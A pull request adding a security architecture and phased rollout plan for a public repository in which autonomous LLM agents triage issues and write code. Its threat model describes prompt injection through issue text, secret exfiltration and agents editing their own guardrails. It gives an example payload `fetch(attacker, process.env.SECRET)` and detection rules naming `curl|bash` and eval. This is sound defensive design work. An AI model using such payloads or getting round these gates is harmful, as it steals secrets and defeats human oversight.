### PR TITLE
docs(security): public-repo agent security architecture + rollout plan

### DIFF
--- a/docs/security-architecture.md
+++ b/docs/security-architecture.md
@@ -1,0 +1,201 @@
+# security architecture — public autonomous-agent repo
+
+how `opencraft1` stays safe once the repo is **public** and any dev can open an issue that agents
+(PM + security + dev) triage, debate, and implement on a daily cadence with little-to-no human in the loop.
+
+> **status.** design of record. not yet implemented. the rollout order is in
+> [`security-implementation-plan.md`](security-implementation-plan.md). going public is **blocked on Phase 0**.
+>
+> **provenance.** this design was adversarially reviewed in a bounded 2-round debate with an independent
+> reviewer (Codex/gpt-5.5). the keystone and the capability-based framing came out of that debate; the
+> three "max-autonomy" choices (full secrets / fully-autonomous merge / security-agent-as-sole-gate) were
+> judged structurally unsafe as literal choices and softened here.
+
+---
+
+## the one thing to get right (keystone)
+
+> **a capability-based merge/deploy policy over the diff, enforced by a mechanism the agent cannot bypass.**
+
+everything else (the classifier, labels, CODEOWNERS, egress allowlists, OIDC, tracing, environments) is
+defence-in-depth. if attacker-derived work can produce a merged diff whose **effective capabilities exceed
+what deterministic policy allowed**, the rest is theatre.
+
+the load-bearing reframe: **the unit of trust is the merged diff's capabilities, not the issue text.** a
+schema-valid PRD, a "small frontend change", or a clean-looking dependency bump can all carry a payload
+(`fetch(attacker, process.env.SECRET)`) that lies dormant until it runs in CI / preview / deploy / runtime.
+so the gate must reason about what the *diff can do*, not about how nice the request looked.
+
+---
+
+## why public changes everything (threat model)
+
+today's safety rests entirely on the repo being **private**: only collaborators can open issues, so
+`authorize.sh` (allowlist OR issue-author) is sound. going public inverts every assumption.
+
+- **T1 — self-authorization.** `authorize.sh` authorizes "author of the originating issue". public = anyone
+  is the author of their own issue → can post `/approved` on it → triggers `dev-implement`. the gate
+  collapses to "anyone, for their own issue". **primary exploit.**
+- **T2 — prompt injection → RCE.** `issues` / `issue_comment` events run with the **base repo's secrets**
+  on the **self-hosted runner**, regardless of who wrote the text (unlike fork *PRs*, issue events are not
+  fork-gated by GitHub). attacker-controlled issue body becomes the agent prompt (`codex exec` today).
+  successful injection = code execution on a persistent machine that holds prod secrets.
+- **T3 — secret exfiltration.** with full secrets in every job, one injection exfiltrates Supabase keys,
+  deploy creds, the agent session — silently.
+- **T4 — guardrail self-modification.** the agent has `contents: write`. an injected task can edit
+  `.github/workflows/**`, the agent prompts, `authorize.sh`, the allowlist, or branch protection — i.e.
+  rewrite its own cage. note: **scheduled workflows run from the default branch**, so a merged workflow
+  change owns all future automation.
+- **T5 — malicious-but-plausible feature.** "add a debug endpoint that echoes env", "relax CORS",
+  "add this dependency" (typosquat / install-script), "log requests to this URL". looks like a feature; is
+  an attack. this is the hardest class — it is **valid code that passes as a feature and runs later where
+  secrets or users exist.**
+- **T6 — PM discussion sprawl / cost-DoS.** unbounded `issue_comment` triggers = infinite agent↔troll
+  loops, brigading, unbounded metered LLM spend.
+- **T7 — persistence / backdoored runner.** self-hosted + public is GitHub's canonical "do not do this": a
+  compromised non-ephemeral runner is a permanent backdoor into your network. the logged-in **Codex session
+  on the runner is itself a high-value credential.**
+
+---
+
+## two planes + deterministic gates
+
+two ideas carry the design.
+
+1. **untrusted plane vs trusted plane.** anything that *reads attacker-controlled text* runs with **no
+   secrets, read-only token, ephemeral isolated runner, egress allowlist, no web/file tools**. the trusted
+   plane *implements from* a structured spec but **treats that spec as tainted** — it never *obeys* it as
+   instructions outside the product-change domain.
+2. **what protects `main` must be deterministic, not LLM judgment.** an LLM security agent is itself
+   injectable; it is defence-in-depth, never the sole gate. branch protection, path policy, and the
+   capability diff-gate are code, and code can't be sweet-talked.
+
+```
+issue / comment  (UNTRUSTED text)
+      │
+      ▼  UNTRUSTED PLANE  · no secrets · read-only token · ephemeral runner · egress allowlist
+      │                   · no web/file tools · metered OpenAI API key + small model (NOT the Codex session)
+ ┌──────────────────────────────────────────────────────────────────┐
+ │ security-audit agent  → structured verdict {enum, confidence, …}  │
+ │ PM agent              → bounded discussion → structured PRD (tainted, carries provenance) │
+ └──────────────────────────────────────────────────────────────────┘
+      │   only structured JSON crosses — never free-form prose acting as commands
+      │   (kills COMMAND injection; SEMANTIC injection still possible → handled by the gate)
+      ▼  deterministic dispatcher applies verdict (label / close / lock). agent has no write capability.
+ ┌──────────────────────────────────────────────────────────────────┐
+ │ DETERMINISTIC GATES (code): injection scan · capability diff-gate │
+ │   · path policy · dedupe · rate limit · permission re-check       │
+ └──────────────────────────────────────────────────────────────────┘
+      │   PRD that passes → spec PR on pm/issue-* branch
+      ▼  TRUSTED DEV PLANE · daily cron · Codex session · NO prod secrets · sandboxed · egress-restricted
+ ┌──────────────────────────────────────────────────────────────────┐
+ │ dev agent implements against the tainted spec → impl PR (codex/issue-*) │
+ └──────────────────────────────────────────────────────────────────┘
+      │   branch protection + required checks + capability diff-gate (all deterministic, non-bypassable)
+      ▼
+   merge to main   ──DECOUPLED──▶   DEPLOY PLANE · the ONLY secret-bearing job
+                                    · OIDC short-lived creds · build without prod secrets
+                                    · env protection (human gate initially)
+```
+
+---
+
+## the 16 agreed controls
+
+grouped by the layer they live in. the implementation order is in the companion plan.
+
+### authorization & secrets
+1. **retire issue-author self-authorization.** `OWNER==ACTOR` must no longer grant dev-flow privileges.
+   re-check `permission ∈ {admin, write}` via the GitHub API **at execution time** for every privileged
+   command (`/approved`, `/merge`, …). **labels are state, not proof of authority** (avoid confused-deputy).
+2. **secret segmentation** (free; highest leverage). untrusted plane = 0 secrets; dev plane = 0 prod
+   secrets (it only writes code); **deploy = the only secret-bearing job**. converts a successful injection
+   from total compromise into a wasted runner minute.
+
+### the gate (keystone)
+3. **capability-based diff-gate** — the keystone, a **required, non-bypassable** check. classifies the
+   *effective capability change* of the diff and **default-denies ambiguity**. capabilities to detect:
+   auth/session/permission changes; data-access & RLS / DB migrations; workflow / CI changes;
+   Docker / build / deploy changes; dependency additions (& install scripts); scripts / hooks; new outbound
+   network behaviour; logging / tracing sinks; artifact / cache behaviour; generated files; symlink / path
+   indirection; GitHub API permission use. path policy alone is **necessary-not-sufficient** — dangerous
+   changes hide in "normal" paths (auth logic in app code, RLS in a migration, a Dockerfile tweak).
+   implement with `gitleaks` + `semgrep` + a dependency/lockfile diff gate + a path classifier.
+4. **risk tiers from the diff, not the issue.**
+   - **Tier A (auto-merge):** no new deps, no new outbound hosts, no auth/session/storage/secret access, no
+     CI/Docker/build/deploy changes, no privileged routes, no eval/subprocess/dynamic import, bounded diff
+     size. **defined by capability, not product area** ("game/content" is not a safe category).
+   - **Tier B (human required):** anything else, or capability-gate confidence below threshold.
+
+### planes, runner, billing
+5. **plane-split billing** (resolves the session-credential risk *and* the cost goal). the **Codex
+   subscription session lives only on the trusted dev runner**; the untrusted PM/security classifier runs on
+   a **cheap metered OpenAI API key + a small model** (classification spend is tiny). the expensive dev work
+   stays on subscription.
+6. **runner hardening.** self-hosted stays (subscription billing; public-repo runner minutes are free under
+   2026 pricing) but becomes **a disposable VM per job**, not just an `--ephemeral` runner *process*.
+   egress allowlist (enumerate the real endpoints — `api.github.com`, `objects.githubusercontent.com`,
+   `ghcr.io`, package registries — and treat GitHub itself as an exfil channel: gists/artifacts/comments).
+   `actions/checkout` with `persist-credentials: false` on untrusted jobs; **no cache shared between
+   untrusted and trusted jobs** (artifacts/caches are a cross-plane injection channel). this is risk
+   *reduction*; self-hosted + public remains against GitHub's official guidance — do not treat it as blessed.
+
+### dev plane anti-exfil (even though secretless)
+   the dev runner has repo-write authority and the Codex session, so it still needs: no host-level session
+   files reachable from the job workspace; no arbitrary outbound network; no broad artifact uploads; tightly
+   scoped GitHub token; clean ephemeral workspace. **implement from the spec, never obey it.**
+
+### branch protection (the wall)
+7. **branch-protection ruleset on `main`:** no direct pushes; PR required; required status checks (incl. the
+   capability gate); linear history; no force-push; signed/bot-identity commits.
+8. **CODEOWNERS as the Tier-B enforcement primitive** — only valid with a ruleset that makes it
+   **non-bypassable**: required code-owner review on guardrail paths
+   (`.github/workflows/**`, `.github/scripts/**`, agent prompts, `authorize.sh`, allowlist, ruleset/env
+   config, `*deploy*` / `*secret*` / auth / CORS, dependency manifests/lockfiles); bot can't dismiss reviews
+   or bypass protection; admin bypass disabled or audited; automerge/merge-queue can't skip it; the
+   ownership files themselves are protected. a bot cannot satisfy a human owner's review → hard block.
+9. **least-privilege tokens.** explicit per-job `GITHUB_TOKEN` permissions; **no `checks:` / `statuses:
+   write`** in agent jobs (else a compromised job forges a passing required check); pin the expected check
+   identity; rulesets must not let bot/admin/Actions bypass required checks.
+
+### deploy
+10. **decouple deploy from merge.** merge ≠ deploy. deploy is a separate workflow in the deploy plane (the
+    only secret-bearing job). use **OIDC short-lived creds**, **build without prod secrets**, inject runtime
+    secrets at the hosting platform. environment protection rules can be non-human (wait timer, deployment-
+    branch restriction) **but those govern *when/where*, not *whether the diff is safe*** — so zero-human
+    deploy is defensible **only if the capability gate (#3) is excellent**. start with a human deploy gate;
+    drop it once the gate has earned trust.
+
+### PM sprawl & abuse
+11. **bounded conversation** (max rounds → `needs-human`); **structured PRD-complete checklist gate** (no
+    checklist → no advance); **dedupe** near-duplicates before expensive work; **per-author + global rate
+    limits**; **cost circuit-breaker** (daily metered-spend cap → freeze + alert); gate third-party comments
+    on **write-permission** rather than blanket-ignoring (maintainers comment too); the **metered API key is
+    a burnable credential** (spend caps, no broad scope, rotate on suspicion).
+12. **PRD carries taint + provenance** (quoted source refs). the classifier must not launder attacker text
+    into invented authority — structured output stops *command* injection, not *semantic* injection.
+
+### observability & control
+13. **tracing with redaction.** Langfuse traces of prompts/outputs may contain secrets/PII/exploit strings —
+    redact, access-control, set retention, and **never trace secret-bearing jobs**.
+14. **demote the security agent** to triage / UX / abuse-throttling. it is **not** a security boundary
+    (it is injectable). the wall is deterministic (#3, #7–#9).
+15. **global kill switch** (`agents:freeze` repo variable/label checked first by every workflow) +
+    **alerts** (Telegram) on security block, policy-gate failure, Tier-B escalation, merge, deploy, cost
+    breach.
+16. **new-account friction.** brand-new / zero-reputation accounts get discussion-only + stricter screening;
+    trust accrues with merged contributions. doesn't block legit devs (they just talk first); raises the cost
+    of throwaway-account abuse.
+
+---
+
+## honest residual risk
+
+with the keystone done well you keep the vision — **any dev, daily cron, hands-off for ordinary features,
+Codex subscription billing** — and give up only (a) prod secrets in untrusted jobs and (b) *unconditional*
+autonomous merge of capability-escalating diffs.
+
+without the keystone, "fully autonomous to main + full secrets + self-hosted" is **structurally unsafe**.
+even with it, the system is **safer, not safe**: the residual risk concentrates in the capability merge gate
+and in malicious-but-valid code (T5). the capability taxonomy is a **product-security artifact that needs an
+owner** — if it rots, attackers route around it.

--- a/docs/security-implementation-plan.md
+++ b/docs/security-implementation-plan.md
@@ -1,0 +1,122 @@
+# security implementation plan
+
+rollout of [`security-architecture.md`](security-architecture.md), in dependency order. each item lists
+**what** to change, **where**, and a **done-check**. one PR per item where practical.
+
+> **gate:** the repo must **not** be flipped to public until **Phase 0 is complete and verified**. Phase 0
+> closes the exploits that exist the instant an untrusted user can open an issue (T1–T4).
+
+current stack the plan edits: self-hosted runner; `codex exec --model gpt-5.5` for PM + dev; workflows
+`pm-intake.yml`, `pm-followup.yml`, `dev-implement.yml`, `dev-revise.yml`, `close-issue-on-impl-merge.yml`;
+gate `.github/scripts/authorize.sh` + `.github/agents-allowlist.txt`; spec branches `pm/issue-*`, impl
+branches `codex/issue-*`.
+
+---
+
+## Phase 0 — blocks going public (must-have)
+
+**0.1 — kill issue-author self-authorization** *(T1)*
+- where: `.github/scripts/authorize.sh`, all four agent workflows.
+- change: remove the `OWNER==ACTOR` branch as a privilege grant. authorization to advance to dev =
+  allowlist OR API permission `∈ {admin, write}`, checked **at execution time** for every privileged
+  command (`/approved`, `/merge`). conversation (PM) stays open to anyone but never escalates privilege.
+- done-check: a throwaway non-collaborator account commenting `/approved` on its own issue does **not**
+  trigger `dev-implement`; an allowlisted/write user still does.
+
+**0.2 — secret segmentation** *(T3)*
+- where: every workflow `env:` / `secrets:` usage; new `deploy.yml`.
+- change: untrusted jobs (PM, security) get **zero secrets**; dev job gets **no prod secrets**; move all
+  prod secrets (Supabase, deploy) into a single deploy job. add explicit per-job `permissions:` (least
+  privilege); remove repo-wide secret exposure.
+- done-check: `grep` shows no prod secret referenced in PM/dev jobs; deploy job is the only consumer.
+
+**0.3 — branch-protection ruleset on `main`** *(T4, wall)*
+- where: GitHub repo ruleset (config-as-doc; record the intended ruleset in this repo).
+- change: no direct push; PR required; required status checks incl. the capability gate (0.5); linear
+  history; no force-push; **no bot/admin/Actions bypass**; signed/bot-identity commits.
+- done-check: a direct push to `main` is rejected; a PR without passing checks cannot merge; bot cannot
+  bypass.
+
+**0.4 — CODEOWNERS guardrail denylist + least-privilege tokens** *(T4, #8/#9)*
+- where: `.github/CODEOWNERS`; ruleset; all workflow `permissions:` blocks.
+- change: require **code-owner review** on guardrail paths (`.github/**`, agent prompts, `authorize.sh`,
+  allowlist, ruleset/env config, `*deploy*`/`*secret*`/auth/CORS, dep manifests/lockfiles); protect the
+  ownership files themselves. remove `checks:`/`statuses: write` from agent jobs; pin expected check
+  identity.
+- done-check: an agent PR touching `.github/workflows/**` is blocked pending human review and cannot
+  automerge.
+
+**0.5 — capability diff-gate (KEYSTONE)** *(#3/#4)*
+- where: new required workflow `policy-gate.yml` + `.github/policy/` rules.
+- change: on every agent PR, run `gitleaks` (no secrets added) + `semgrep` (no new egress / `curl|bash` /
+  eval / subprocess / dynamic import) + dependency-allowlist & lockfile-diff gate + path/capability
+  classifier. **default-deny ambiguity.** emit the Tier (A/B); Tier B → require human. make it a
+  **required, non-bypassable** check in the ruleset.
+- done-check: a PR adding `fetch(env.SECRET)` or a new dependency fails the gate; a docs-only PR passes as
+  Tier A.
+
+---
+
+## Phase 1 — plane split & runner hardening
+
+**1.1 — split billing across planes** *(#5)*
+- change: untrusted PM/security → metered **OpenAI API key + small model** (new secret, scoped, spend-
+  capped); trusted dev → keep the **Codex subscription session**, on a **separate runner label**. untrusted
+  jobs physically cannot reach the Codex session.
+- done-check: PM job has no access to the Codex session/creds; dev job runs on the `trusted` runner only.
+
+**1.2 — disposable, egress-restricted runners** *(#6, T7)*
+- change: one **disposable VM per job** (not just `--ephemeral` process); egress allowlist (enumerate real
+  GitHub/registry endpoints); `actions/checkout` `persist-credentials: false` on untrusted jobs; **no cache
+  shared between untrusted and trusted jobs**.
+- done-check: a job cannot reach an arbitrary external host; VM is destroyed post-job; no cross-plane cache.
+
+**1.3 — security agent → structured verdict + deterministic dispatcher** *(#12/#14)*
+- change: security agent emits `{verdict∈enum, confidence, reason, sensitive_paths[]}` only; a **code**
+  dispatcher maps enum→action (label/close/lock). agent has **no write capability**. PRD/verdict carry
+  taint + provenance (quoted source refs).
+- done-check: agent output that says "close all issues" does nothing unless the enum maps to it; dispatcher
+  is the only writer.
+
+---
+
+## Phase 2 — tiering & deploy
+
+**2.1 — capability Tier A/B classifier wired to merge** *(#4)*
+- change: the gate's Tier output drives automerge eligibility; Tier A auto-merges, Tier B → `needs-human`.
+- done-check: Tier A feature auto-merges end-to-end; Tier B halts for review.
+
+**2.2 — decouple deploy, OIDC, build-without-secrets, human gate first** *(#10)*
+- where: new `deploy.yml` + GitHub Environment.
+- change: deploy separate from merge; OIDC short-lived creds; build without prod secrets, inject at hosting
+  platform; environment protection with a **human approval gate initially** (relax to wait-timer/branch-
+  restriction only once 0.5 is proven).
+- done-check: a merge to `main` does not auto-deploy; deploy requires the gate; build job holds no prod
+  secrets.
+
+---
+
+## Phase 3 — abuse / PM controls & observability
+
+**3.1 — PM sprawl & abuse controls** *(#11)*
+- change: bounded rounds → `needs-human`; structured PRD-complete checklist gate; dedupe; per-author +
+  global rate limits; cost circuit-breaker (daily metered-spend cap → freeze + alert); third-party comments
+  gated on write-permission; metered key treated as burnable (caps, rotation).
+- done-check: an issue can't loop forever; a duplicate is linked+closed; spend cap trips the freeze.
+
+**3.2 — observability, kill switch, alerts, new-account friction** *(#13/#15/#16)*
+- change: Langfuse tracing with redaction + retention + **no tracing of secret jobs**; `agents:freeze`
+  kill switch checked first by every workflow; Telegram alerts on block/policy-fail/Tier-B/merge/deploy/
+  cost-breach; new/zero-rep accounts → discussion-only until trust accrues.
+- done-check: setting `agents:freeze` halts all agent workflows; traces contain no secrets; a brand-new
+  account's issue does not auto-advance to dev.
+
+---
+
+## sequencing notes
+
+- 0.5 (keystone) and 0.3/0.4 (ruleset) are mutually reinforcing — land them together; a gate that the bot
+  can bypass is worthless.
+- Phase 1.1 depends on 0.2 (secret segmentation) being in place so the metered key is scoped from day one.
+- treat the capability taxonomy (0.5) as an owned, versioned artifact; review it whenever a new attack class
+  appears. it is the thing attackers will probe.


### PR DESCRIPTION
## what

Design of record for taking `opencraft1` **public** with autonomous agents (PM + security + dev), plus a phased rollout. Adversarially reviewed in a 2-round codex-debate (gpt-5.5).

- `docs/security-architecture.md` — threat model (T1–T7, public-repo trust inversion), the **keystone** (capability-based merge/deploy policy over the diff), two-plane + deterministic-gate model, the 16 agreed controls, honest residual risk.
- `docs/security-implementation-plan.md` — phased rollout. **Phase 0 blocks going public.**

## key points

- **Unit of trust = the merged diff's capabilities, not the issue text.**
- **Primary public-repo exploit:** `authorize.sh` `OWNER==ACTOR` → any issue author self-authorizes → `/approved` → `dev-implement`. Phase 0.1 retires it.
- **Plane-split billing:** untrusted PM/security → metered OpenAI API + small model; Codex subscription session stays only on the trusted dev runner.
- **Secret segmentation** (free, highest-leverage) + decoupled deploy with OIDC short-lived creds.
- The LLM security agent is triage, **not** a security boundary.

## scope

Docs only — no workflow / `authorize.sh` / ruleset changes. Those land as their own reviewed PRs per the plan (guardrail changes require human review by design).

🤖 Generated with [Claude Code](https://claude.com/claude-code)